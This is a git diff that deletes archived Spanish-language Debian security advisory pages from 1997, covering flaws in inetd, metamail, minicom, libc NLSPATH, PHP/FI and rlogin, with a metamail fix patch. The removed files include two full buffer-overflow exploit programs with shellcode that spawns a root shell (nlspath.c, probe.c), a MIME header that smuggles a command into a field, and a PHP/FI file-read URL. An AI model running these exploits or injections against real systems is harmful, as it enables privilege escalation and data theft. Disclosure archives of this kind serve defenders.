-y pueden ser distribuidos libremente a condici&oacute;n de que no sea cargada ninguna cuota por
-su distribuci&oacute;n, y que el credito adecuado sea dado. <p>
-
-imapd and ipop3d est&aacute;n bajo la siguiente licencia: <p>
-
-Copyright 1997 by the University of Washington <p>
-
-Permission to use, copy, modify, and distribute this software and its
-documentation for any purpose and without fee is hereby granted, provided
-that the above copyright notice appears in all copies and that both the
-above copyright notice and this permission notice appear in supporting
-documentation, and that the name of the University of Washington not be
-used in advertising or publicity pertaining to distribution of the software
-without specific, written prior permission. This software is made
-available "as is", and
-THE UNIVERSITY OF WASHINGTON DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED,
-WITH REGARD TO THIS SOFTWARE, INCLUDING WITHOUT LIMITATION ALL IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND IN
-NO EVENT SHALL THE UNIVERSITY OF WASHINGTON BE LIABLE FOR ANY SPECIAL,
-INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
-LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, TORT
-(INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING OUT OF OR IN CONNECTION
-WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/inetd-groups.html b/spanish/security/info/inetd-groups.html
deleted file mode 100644
index 34c3ff811a7..00000000000
--- a/spanish/security/info/inetd-groups.html
+++ /dev/null
@@ -1,50 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados
-a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Mar, 25 Mar 1997 02:30:39 -0500</b> <br>
-<b>De: David Holland &lt;dholland@eecs.harvard.edu&gt;</b> <p>
-
-<pre>
- > En el mensage <Pine.SUN.3.94.970324024042.15592A@dfw.dfw.net> Aleph One escribi&oacute;:
- > : tftpd en la distribuci&oacute;n de FreeBSD utiliza chroot() y no asigna su uid a nadie.
- > : No creo, que haga algo razonable con los grupos.
- >
- > El de FreeBSD hereda los grupos del proceso que lo invoca, que es
- > inetd. No se si eso es razonable o no, pero creo que significa
- > que el grupo ser&aacute; demonio. tftpd no hace nada con los grupos.
-</pre>
-
-Ya que estamos en ello: muchos inetd no limpian las listas de grupos cuando
-se inician, por lo que si se mata y reinicia inetd desde su shell de root
-los subprocesos de inetd pueden heredar grupos adicionales (probablemente privilegiados). <p>
-
-No se si en el inetd de FreeBSD padece este problema, pero la versi&oacute;n
-actual de Linux s&iacute;. (La siguiente versi&oacute;n no lo har&aacute;; si es de inter&eacute;s puedo enviar el parche.) <p>
-
-El impacto de este problema afortunadamente es bastante limitado, y normalmente no existe una raz&oacute;n real para el root de estar en la pila entera de grupos. <p>
-
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/metamail.html b/spanish/security/info/metamail.html
deleted file mode 100644
index 58995983a50..00000000000
--- a/spanish/security/info/metamail.html
+++ /dev/null
@@ -1,76 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>De: Alan Cox &lt;alan@cymru.net&gt;</b> <br>
-<b>Fecha: Mie, 9 Abr 1997 10:58:48 +0100 (BST)</b> <p>
-
-Este parece ser un fallo de tcsh, pero aparece con metamail y puede ser abusado. El mensaje de Olaf se muestra abajo. Lo he pasado tambi&eacute;n al CERT <p>
-
-Alan Cox <p>
-
-<hr>
-
-Hola Alan, <p>
-
-Aqu&iacute; tienes la info de metamail que promet&iacute; enviarte. El agujero puede ser explotable si
-dejas que metamail ejecute showext para los mensajes del tipo message/external-body. Al menos tcsh, y posiblemente algunos otros csh,
-parece que hacen cosas misteriosas al expandir los argumentos de la linea de comandos.
-Si se le pasa a un script un argumento de "foo FTP=/tmp/evilcmd", y hace <p>
-
-<pre>
- set var=$1
-</pre>
-
-esto puede asignar foo a $var, y /tmp/evilcmd a $FTP. Desgraciadamente,
-metamail invoca a showext con los atributos mime en la l&iacute;nea de comandos,
-as&iacute; que b&aacute;sicamente le evia una cabecera como &eacute;sta <p>
-
-<pre>
- Content-type: message/external-body;
- access-type="anon-ftp";
- name="passwd";
- site="monad.swb.de";
- directory="/etc";
- mode="image FTP=/tmp/evilcmd"
-</pre>
-
-Adem&aacute;s, m&aacute;s abajo, el script ejecutar&aacute; $FTP para iniciar la conexi&oacute;n de ftp.
-Hasta ahora, no he sido capaz de pasarle argumentos al comando, pero eso
-no signifaica que t&uacute; no puedas hacer cosas interesantes con lo anterior. <p>
-
-El parche se incluye <a href="metamail.patch">aqu&iacute;</a>. <p>
-
-Saludos
-Olaf <p>
-<hr>
-<pre>
-Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
-okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
-okir@lst.de +-------------------- Why Not?! -----------------------
-</pre>
-<hr>
-
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/metamail.patch b/spanish/security/info/metamail.patch
deleted file mode 100644
index e58eeaa67fe..00000000000
--- a/spanish/security/info/metamail.patch
+++ /dev/null
@@ -1,66 +0,0 @@
-diff -ur zap/mm2.7/src/bin/showexternal mm2.7/src/bin/showexternal
---- zap/mm2.7/src/bin/showexternal Tue Feb 8 17:39:05 1994
-+++ mm2.7/src/bin/showexternal Thu Jan 16 12:00:25 1997
-@@ -27,26 +27,34 @@
- echo "Usage: showexternal body-file access-type name [site [directory [mode [server]]]]"
- exit -1
- endif
--set bodyfile=$1
-+# Check argument integrity. Don't trust mail headers
-+switch ("$1$2$3$4$5$6$7")
-+case "*[ ]*":
-+ echo "Illegal white space in arguments -- possibly a mail bomb?!"
-+ echo "Command was:"
-+ echo \'$0\' \'$1\' \'$2\' \'$3\' \'$4\' \'$5\' \'$6\' \'$7\'
-+ exit 2
-+endsw
-+set bodyfile="$1"
- set atype=`echo $2 | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz`
--set name=$3
-+set name="$3"
- if ($#argv > 3) then
-- set site=$4
-+ set site="$4"
- else
- set site=""
- endif
- if ($#argv > 4) then
-- set dir=$5
-+ set dir="$5"
- else
- set dir=""
- endif
- if ($#argv > 5) then
-- set mode=$6
-+ set mode="$6"
- else
- set mode=""
- endif
- if ($#argv > 6) then
-- set server=$7
-+ set server="$7"
- else
- set server=""
- endif
-diff -ur zap/mm2.7/src/bin/showpartial mm2.7/src/bin/showpartial
---- zap/mm2.7/src/bin/showpartial Thu Feb 3 00:21:29 1994
-+++ mm2.7/src/bin/showpartial Thu Jan 16 11:48:59 1997
-@@ -11,14 +11,14 @@
- echo "Usage: showpartial file id partnum totalnum"
- exit -1
- endif
--set file=$1
-+set file="$1"
- # This next line is because message-id can contain weird chars
--set id=`echo $2 | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\`
--@ partnum = $3
-+set id=`echo "$2" | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\`
-+@ partnum = "$3"
- if ($#argv == 3 || $4 == "") then
- set totalnum=-1
- else
-- @ totalnum = $4
-+ @ totalnum = "$4"
- endif
-
- if (! -d $TREEROOT) then
diff --git a/spanish/security/info/minicom.html b/spanish/security/info/minicom.html
deleted file mode 100644
index b4426c0e994..00000000000
--- a/spanish/security/info/minicom.html
+++ /dev/null
@@ -1,75 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. Las mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados
-ha nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Lun, 10 Feb 1997 05:44:53 +0400</b> <br>
-<b>De: "Dmitry E. Kim" &lt;jason@redline.ru&gt;</b> <p>
-
- hola ppl, <p>
-
- bueno, aqu&iacute; va otra vulnerabilidad del desbordamiento de buffer estandar, que veces puede llevar al root en un compromiso (no siempre. no en las nuevas distribuciones,
-afortunadamente). El Slackware y Red Hat actuales no instalan minicom como
-suid root, s&oacute;lo sgid/uucp, que no es *tan* peligroso. Pero cuando se construye minicom desde el fuente, te pide que le hagas un "chmod +s". <p>
-
-<dl>
-<dt><b>Resumen:</b>
-<dd> La vulnerabilidad en minicom permite a (ciertos) usuarios locales obtener privilegios de grupo "uucp" y, en ciertos casos, privilegios de root.
-
-<dt><b>Plataformas:</b>
-<dd> Supuestamente todas las plataformas donde minicom se instala como suid y/o sgid.
- Solo lo he probado en algunas boxes de Linux (reciente Slackware 3.1 y
- reciente Red Hat 4.1), y a mi me funcionaba.
-
-<dt><b>Descripci&oacute;n:</b>
-<dd> De acuerdo con las p&aacute;ginas man, "minicom es un programa de comunicaciones que se
- parece algo al programa shareware TELIX pero es libre con el c&oacute;digo fuente y corre
- bajo la mayor&iacute;a de los unices".
- El binario de Minicom normalmente pertenece a usuario "root" y al grupo "uucp", y es
- "-rwxr-sr-x" o, en algunas distribuciones viejas, "-rwsr-sr-x". En realidad,
- minicom tiene *muchos* buffers de distintos tama&ntilde;os y es realmente sencillo
- desbordar alguno de ellos. Al menos uno de esos buffers desbordables es
- autom&aacute;tico -- un argumento en la opci&oacute;n "-d" de minicom se copia en
- un array autom&aacute;tico de 128 bytes. De este modo, es posible sobreescribir la direcci&oacute;n de retorno de la funci&oacute;n y ejecutar cualquier c&oacute;digo (como suele ser).
-
-<dt><b>Impacto:</b>
-<dd> Si minicom se instala como suid root, cualquier usuario que tenga permitido usar
- minicom puede obtener un shell de root. Si minicom se instala como sgid uucp, cualquier
- usuario de minicom puede obtener privilegios del grupo uucp (por favor no crea que no es
- nada -- al menos en m&aacute;quinas Slackware /usr/lib/uucp puede ser escrito por el grupo.
- Esto significa que puede sustituir facilmente uucico/uuxqt/etc con sus scripts).
-
-<dt><b>Soluci&oacute;n:</b>
-<dd> R&aacute;pido arreglo, como normalmentec -- chmod 755 `which minicom`.
-
-<dt><b>"Exploit":</b>
-<dd> Abajo va el "exploit" para Linux. Despu&eacute;s de ejecutarlo, tienes el shell con
- uid=0 y euid=your_usual_uid (si minicom es suid root) y gid=uucp
- egid=su_gid_usual. Conseguir los permisos reales de root y del grupo uucp desde ah&iacute
- es demasiado trivial para describirlo aqu&iacute&;.
-
-Fichero de quoting "<a href="stack.c">stack.c</a>"
-
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/nlspath.c b/spanish/security/info/nlspath.c
deleted file mode 100644
index 8b69b566221..00000000000
--- a/spanish/security/info/nlspath.c
+++ /dev/null
@@ -1,39 +0,0 @@
-/*
- * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
- * Copyright (c) 1997 by Solar Designer
- */
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-
-char *shellcode =
- "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
- "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
- "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
- "\xcd\x80/"
- "/bin/sh"
- "0";
-
-char *get_sp() {
- asm("movl %esp,%eax");
-}
-
-#define bufsize 2048
-char buffer[bufsize];
-
-main() {
- int i;
-
- for (i = 0; i < bufsize - 4; i += 4)
- *(char **)&buffer[i] = get_sp() - 3072;
-
- memset(buffer, 0x90, 512);
- memcpy(&buffer[512], shellcode, strlen(shellcode));
-
- buffer[bufsize - 1] = 0;
-
- setenv("NLSPATH", buffer, 1);
-
- execl("/bin/su", "/bin/su", NULL);
-}
diff --git a/spanish/security/info/nlspath.html b/spanish/security/info/nlspath.html
deleted file mode 100644
index fbaedef1da0..00000000000
--- a/spanish/security/info/nlspath.html
+++ /dev/null
@@ -1,67 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Security Information</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Mar, 13 Feb 1997 23:08:13 -0500</b> <br>
-<b>Desde: solar@IDEAL.RU</b> <p>
-
-Hola! <p>
-
-Disculpad si las informaciones que voy a exponer a continuaci&oacute;n son ya
-conocidas, pero espero que no lo sean ... <p>
-
-Acabo de encontrar una vulnerabilidad en la libc de Linux (En realidad, algunas
-versiones parece que no son vulnerables; mi Slackware 3.1 si lo es).
-Por desgracia, no tengo tiempo ahora para una investigaci&oacute;n m&aacute;s profunda,
-pero aqu&iacute; est&aacute; la vulneraci&oacute;n . Tenga en cuenta que el c&oacute;digo
-shell es ligeramente diferente del habitual: <p>
-<ul>
-<li> Efect&uacute;a setuid(geteuid()) mediante &eacute;l mismo;
-<li> Es m&aacute;s f&aacute;cil de modificar (no hay direcciones "a cap&oacute;n" en el
-c&oacute;digo, y el nombre del shell se puede cambiar tambi&eacute;n; la longitud no
-es fija);
-<li> El propio puntero a NULL se pasa en %edx a la llamada del sistema execve,
-no la referencia a NULL (parece en error en el art&iacute;culo de Aleph One); &eacute;sto no parece afectar a nada de cualquier manera.
-
-</ul>
-
-Es pobible vulnerar &eacute;ste agujero de manera remota, mediante el uso de un
-telnet parcheado que permitiese exportar un entorno de variables suficientemente
-grande. El desbordamiento ocurrir&iacute;a en el arranque de /bin/login (algo similar
-al famoso exploit LD_PRELOAD, pero como desbordamiento). No obstante,no estoy
-seguro de ello puesto que puede haber algunas restricciones en la variables de
-entorno de telnetd. <p>
-
-En relaci&oacute;n con el arreglo, bueno, es duro -- pudiera ser necesario
-recompilar libc y librer&iacute;as lincadas est&aacute;ticamente. Para protegerse Vd.
-mismo contra ataques remotos, puede por ejemplo cambiar el nombre de la
-variable a &aacute;lgo distinto, con un editor hexadecimal (como /usr/bin/bpe),
-en /lib/libc.so.5, y asegurarse de que la vulneraci&oacute;n ha dejado de
-funcionar. Por supuesto, &eacute;sto es s&oacute;lo un arreglo temporal. <p>
-
-<a href="nlspath.c">nlspath.c</a> y <a href="shellcode.s">shellcode.s</a>
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1.998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/nslpath.html b/spanish/security/info/nslpath.html
deleted file mode 100644
index fa291e0f5e3..00000000000
--- a/spanish/security/info/nslpath.html
+++ /dev/null
@@ -1,51 +0,0 @@
-
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas de seguridad</a> que no llegas son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Thu, 13 Feb 1997 23:08:13 -0500</b> <br>
-<b>De: solar@IDEAL.RU</b> <p>
-
-Hola! <p>
-
-Lo siento si la informaci&oacute;n que voy a dar ya se conoce, pero
-espero que no sea as&iacute;... <p>
-
-Solo raramente he encontrado una vulnerabilidad en el libc de Linux (en realidad, algunas de las versiones no parecen ser vulnerables; mi box de Slackware 3.1 se supon&iacute;a).
-Desafortunadamente, no tengo tiempo para una buena investigaci&oacute;n ahora mismo, pero aqu&iacute; va el exploit de todos modos. Notese que el c&oacute;digo de shell es algo diferente del habitual: <p>
-<ul>
-<li> realiza setuid(geteuid()) por sí mismo;
-<li> m&aacute;s f&aacute;cil de modificar (no m&aacute;s offsets fijos en el c&oacute;digo de shell, y tambi&eacute;n se puede cambiar el nombre del shell -- la longitud no es fija);
-<li> el mismo puntero NULL se pasa en el %edx a la llamada del sistema execve, no el
-puntero al NULL (parece un error del art&iacute;culo de Aleph One); esto
-no parece afectar en nada.
-</ul>
-
-Puede explotarse este agujero remotamente, si se usa un cliente de telnet parcheado que permita exportar largos valores de variables de entorno. El
-desbordamiento ocurrir&aacute; al inicio del /bin/login luego (algo parecido al famoso 'exploit' LD_PRELOAD, pero un desbordamiento). No estoy seguro de ello, puede haber algunas restricciones sobre las variables de entorno en telnetd. <p>
-
-Como soluci&oacute;n, esta es una complicada -- requerir&iacute;a la recompilaci&oacute;n de libc, y de los binarios enlazados est&aacute;ticamente. Para protegerse contra los ataques remotos, puede por ejemplo cambiar el nombre de la variable name a otro distinto, con el editor hex (como /usr/bin/bpe), en /lib/libc.so.5, y asegurarse de que el exploit deja de funcionar. Por supuesto, esta es solo un soluci&oacute;n temporal. <p>
-
-<a href="nlspath.c">nlspath.c</a> y <a href="shellcode.s">shellcode.s</a>
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute;n: 10 Enero 1998.
-Copyright &copy;1997 SPI; Ver
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/php.html b/spanish/security/info/php.html
deleted file mode 100644
index d9f8ab41814..00000000000
--- a/spanish/security/info/php.html
+++ /dev/null
@@ -1,81 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre Seguridad</H1>
-<HR>
-Debian se toma la seguridad muy en serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> llegados
-a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Mie, 16 Apr 1997 21:01:12 -0400</b><br>
-<b>De: Shamanski &lt;jshaman@m-net.arbornet.org&gt;</b><p>
-
-<hr>
-[DiS] Advisory 97-347.1<br>
-Fecha Edici&oacute;n: 16 de Abril de 1997<br>
-Tema: Vulnerabilidad REMOTA en PHP/FI<br>
-<hr>
-
-DIS ha encontrado una vulnerabilidad en PHP/FI, a cgi mejorado de NCSA httpd.
-Esta vulnerabilidad permito a usuarios no autorizados ver el contenido de cualquier fichero en la m&aacute;quina donde corra httpd enviando el nombre del fichero que desea ver como QUERY_STRING. <p>
-
-<ol>
-<li> "Exploit"
-
- simplemente utilice cualquier nevegador de web para enviar lo siguiente URL:
-
- http://boogered.system.com/cgi-bin/php.cgi?/file/to/view
-
- Nota: este "exploit" no ha sido probado en un sistema que haya compilado PHP/FI como un m&oacute;dulo de apache. Esta informaci&oacute;n puede ser o no ser aplicable en dicho sistema.
-
-<li> Impacto
-
- Usuarios remotos no autorizados pueden ver el contenido de cualquier fichero en el sistema
- con los mismos privilegios que los procesos hijos de httpd (demonio de HTTP).
-
-
-<li> Soluci&oacute;n
-
- El autor ha propuesto la siguiente soluci&oacute;n:
-
- <em>
- ...Consiste en establecer lo siguiente en php.h<p>
-
- #define PATTERN_RESTRICT ".*\\.phtml$"<p>
-
- Esto limitar&aacute; al parser php.cgi a presentar solo los ficheros terminados en .phtml <p>
-
- El mismo aviso se aplica a cualquier otro parser que alguien pueda decidir instalar en su directorio cgi-bin directory. Esto no es de ning&uacute;n modo espec&iacute;fico de PHP/FI. <p>
-
- Puede tambi&eacute;n evitar el problema usando la redirecci&oacute;n CGI o la versi&oacute;n del m&oacute;dulo de Apache. <p>
-
- -Rasmus
- </em>
-</ol>
-
-La distribuci&oacute;n actual de PHP/FI puede obtener en <a href="http://www.vex.net/php/">http://www.vex.net/php/</a> <p>
-
-<hr>
-J-Man Th' Shaman [DiGiTAL iNFORMATiON SOCiETY]<br>
-<a href="mailto:jshaman@m-net.arbornet.org">jshaman@m-net.arbornet.org</a><br>
-<a href="mailto:jamin@avatar.ml.org">jamin@avatar.ml.org</a><p>
-<hr>
-</blockquote>
-
-<P><SMALL>&Uacute;ltima modificaci&oacute: 10 Jan 1998.
-Copyright &copy;1997 SPI; Vea
-<A HREF="../../license.html">condiciones de licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/probe.c b/spanish/security/info/probe.c
deleted file mode 100644
index 05b04f7b9d6..00000000000
--- a/spanish/security/info/probe.c
+++ /dev/null
@@ -1,39 +0,0 @@
-/*
- * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
- * Copyright (c) 1997 by Solar Designer
- */
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-
-char *shellcode =
- "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
- "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
- "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
- "\x31\xdb\xcd\x80/"
- "/bin/sh"
- "0";
-
-char *get_sp() {
- asm("movl %esp,%eax");
-}
-
-#define bufsize 8192
-#define alignment 0
-char buffer[bufsize];
-
-main() {
- int i;
-
- for (i = 0; i < bufsize / 2; i += 4)
- *(char **)&buffer[i] = get_sp() - 2048;
- memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
- strcpy(&buffer[bufsize - 256], shellcode);
- setenv("SHELLCODE", buffer, 1);
-
- memset(buffer, 'x', 72);
- *(char **)&buffer[72] = get_sp() - 6144 - alignment;
- buffer[76] = 0;
-
- execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
-}
diff --git a/spanish/security/info/rlogin.html b/spanish/security/info/rlogin.html
deleted file mode 100644
index 0e403e1099f..00000000000
--- a/spanish/security/info/rlogin.html
+++ /dev/null
@@ -1,208 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-<blockquote>
-<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.06.rlogin-term">Notificaci&oacute;n-CERT</a> <p>
-
-El Centro de Coordinaci&oacute;n del CERT ha recibido noticias sobre vulnerabilidades
-en varias implementaciones del programa rlogin, incluyendo eklogin y klogin.
-Aprovechado &eacute;sta vulnerabilidad, usuarios con acceso a una cuenta del sistema
-pueden causar desbordamiento de memoria ("buffer overflow") y ejecutar programas
-como root.
-
-El equipo de CERT/CC recomienda instalar un parche del proveedor para &eacute;ste
-problema (Sec. III.A). Hasta que pueda hacerlo, le recomendamos encarec&iacute;damente
-que deshabilite rlogin &oacute; lo sustituya por un programa "envoltorio" (wrapper).
-(Ver Sec. III.B.2). <p>
-
-Actualizaremos &eacute;sta notificaci&oacute;n tan pronto como recibamos informaci&oacute;n adicional.
-Por favor, compruebe regularmente &eacute;stos ficheros de notificaci&oacute;n para actualizaciones relativas a su instalaci&oacute;n. <p>
-
-<hr>
-
-<ol>
-<li><b> Descripci&oacute;n</b> <p>
-
- El programa rlogin, suministrado en muchos sistemas UNIX y no-UNIX, se describe en la RFC 1282.
- A continuaci&oacute;n se muestra una parte de &eacute;sa RFC, la cual describe su funcionalidad b&aacute;sica: <p>
-
-
- <em>
- "La facilidad rlogin ofrece un terminal virtual con control de flujo
- local y un vaciado adecuado de la salida. Es usado extensamente entre
- equipos Unix ya que provee el intercambio de un mayor n&uacute;mero de
- controles de pantalla que el protocolo Telnet, y adem&aacute;s dado que
- se puede configurar para que entre conexiones entre servidores
- autentificados no sea requerida palabra de paso."
-
- </em> <p>
-
- La clave de &eacute;sta descripci&oacute;n es que el programa rlogin traspasa la
- descripci&oacute;n del terminal desde el equipo local al remoto.
- Esta funcionalidad permite que programas que precisan terminal, tales
- como editores de texto a pantalla completa, puedan trabajar adecuadamente
- entre una conexion ordenador-a-ordenador creada con rlogin. <p>
-
- Para llevar &eacute;sto a cabo, el programa rlogin utiliza la definici&oacute;n actual
- del terminal identificada por la variable de entorno TERM. El protocolo,
